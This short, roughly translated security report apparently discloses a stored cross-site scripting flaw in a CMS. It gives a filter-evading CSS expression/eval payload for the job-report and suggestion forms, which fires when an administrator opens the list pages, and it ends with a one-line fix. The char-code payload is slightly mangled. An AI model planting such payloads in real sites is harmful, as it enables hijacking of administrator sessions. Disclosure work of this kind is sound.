Server guard CMS storage-type XSS dedicated account Administrator
Server guard CMS storage-type XSS dedicated account administrator.
1. Home> recruitment information> job details
You can see "report" on the page"
Click report and enter:
I want to report this fraudulent position. What is this company rogue? What is "style =" a: expre/**/ssion (eval (String. fromCharCode (97,108,101,114,116, 40,100,111, 99,117,109,101,110,116, 111,111,107,105,101, 41) "a ="
The background administrator is on the report list page.
2. The "I want to suggest" icon is displayed on each page. Click Submit suggestion:
Feedback feedback meaning "style =" a: expre/**/ssion (eval (String. fromCharCode (97,108,101,114,116, 40,100,111, 99,117,109,101,110,116, 111,111,107,105,101, 41) "a ="
The background administrator will go to the suggestion list page to find the target.
The test results of IE8 are as follows. Almost all other browsers are filtered out.
Solution:
When filtering xss, style is also filtered.